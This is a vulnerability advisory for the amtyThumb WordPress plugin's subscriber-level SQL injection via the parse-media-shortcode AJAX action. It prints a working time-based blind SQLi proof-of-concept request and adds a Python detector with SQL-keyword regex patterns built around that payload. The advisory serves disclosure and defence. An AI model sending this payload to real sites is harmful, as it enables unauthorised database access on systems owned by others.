wpvulndb - Daniel Krohmer
WPVDB-ID: 359D145B-C365-4E7C-A12E-C26B7B8617CE
History: May 09, 2022 - 12:00 a.m.

amtyThumb <= 4.2.0 - Subscriber+ SQLi

Published: 2022-05-09 00:00:00
Author: Daniel Krohmer
Source: wpscan.com

EPSS: 0.001 (Low)
EPSS Percentile: 45.2%

The plugin does not sanitise and escape a parameter before using it in a SQL statement via its shortcode, leading to an SQL injection. The issue is exploitable by any authenticated user (not just Author+, as the original advisory mentions), because authenticated users can execute shortcodes via an AJAX action.

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 168
Connection: close
Cookie: [any authenticated user]

action=parse-media-shortcode&shortcode=%5bamtyThumbOnly%20percent%3d50%20post_id%3d1%2f**%2fAND%2f**%2f(SELECT%2f**%2f7741%2f**%2fFROM%2f**%2f(SELECT(SLEEP(5)))hlAf)%5d
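Added detection example, not code from the advisory or from the amtyThumb plugin: a request-body check that a WAF rule or a log-review script could apply to admin-ajax.php traffic, flagging parse-media-shortcode calls whose amtyThumb shortcode attributes carry SQL comment or keyword tokens. The suspicious body is the PoC body above; the benign body, the regexes and the assumption that post_id must be an integer are my own.

```python
"""Flag admin-ajax.php bodies that route an amtyThumb shortcode through
parse-media-shortcode with SQL-looking attribute values (added example)."""
import re
from urllib.parse import parse_qs

# Body copied from the PoC above (decodes to [amtyThumbOnly percent=50 post_id=1/**/AND ...]).
POC_BODY = ("action=parse-media-shortcode&shortcode=%5bamtyThumbOnly%20percent%3d50"
            "%20post_id%3d1%2f**%2fAND%2f**%2f(SELECT%2f**%2f7741%2f**%2fFROM%2f**%2f"
            "(SELECT(SLEEP(5)))hlAf)%5d")
# Constructed benign body: same shortcode with plain numeric attributes.
BENIGN_BODY = "action=parse-media-shortcode&shortcode=%5bamtyThumbOnly%20percent%3d50%20post_id%3d1%5d"

# Any amtyThumb* shortcode tag (the PoC uses amtyThumbOnly).
AMTY_TAG = re.compile(r"\[\s*(amtyThumb\w*)", re.IGNORECASE)
# key=value attribute pairs; values are quoted or run until whitespace or the closing bracket.
ATTR = re.compile(r"(\w+)\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s\]]+)")
# Comment tricks and SQL keywords that never belong in a numeric shortcode attribute.
SQL_MARKERS = re.compile(r"/\*|\*/|--|;|'|\"|\b(?:SELECT|UNION|SLEEP|BENCHMARK|AND|OR)\b",
                         re.IGNORECASE)


def inspect_admin_ajax_body(body: str) -> dict:
    """Return a verdict dict; 'suspicious' is True when an amtyThumb attribute looks like SQL."""
    params = parse_qs(body, keep_blank_values=True)  # percent-decodes the shortcode
    action = params.get("action", [""])[0]
    shortcode = params.get("shortcode", [""])[0]
    verdict = {"action": action, "tag": None, "bad_attrs": {}, "suspicious": False}
    if action != "parse-media-shortcode":
        return verdict  # only the shortcode-rendering AJAX action is in scope
    tag = AMTY_TAG.search(shortcode)
    if not tag:
        return verdict  # some other shortcode; not this advisory's pattern
    verdict["tag"] = tag.group(1)
    for key, value in ATTR.findall(shortcode[tag.end():]):
        value = value.strip("\"'")
        # Assumption: post_id must be an integer (WordPress post IDs always are).
        if SQL_MARKERS.search(value) or (key == "post_id" and not value.isdigit()):
            verdict["bad_attrs"][key] = value
    verdict["suspicious"] = bool(verdict["bad_attrs"])
    return verdict


if __name__ == "__main__":
    for body in (POC_BODY, BENIGN_BODY):
        print(inspect_admin_ajax_body(body))
```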

CPE Name    Operator    Version
amtythumb   eq          *

